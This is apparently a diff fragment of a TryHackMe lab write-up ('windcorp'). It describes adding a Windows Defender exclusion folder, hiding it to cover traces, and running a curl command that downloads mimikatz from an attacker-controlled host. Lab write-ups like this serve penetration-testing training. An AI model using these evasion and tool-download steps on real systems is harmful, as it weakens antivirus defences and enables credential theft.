zinzloun/THM_WriteUP/windcorp/README.md

 	 alcrez                                    1  Disc            2  7/9/2024 5:22 AM

 	PS C:\users\chajoh\desktop> logoff 1
+Eventually follows the first access configuration required steps for support.it user.
 Once logged in as local administrator I managed to define a defender esclusion folder in:

 	C:\Users\Public\support_tools
  Eventually you can hide the folder to cover a bit our traces.
 Then I downloaded into Osiris mimikatz:

- 	C:\Users\Public\support_tools>curl -O http://10.9.0.223:8000/mimikatz.exe
+ 	C:\Users\Public\support_tools> curl -O http://10.9.0.223:8000/mimikatz.exe

 Execute mimikatz and set the appropriate permissions: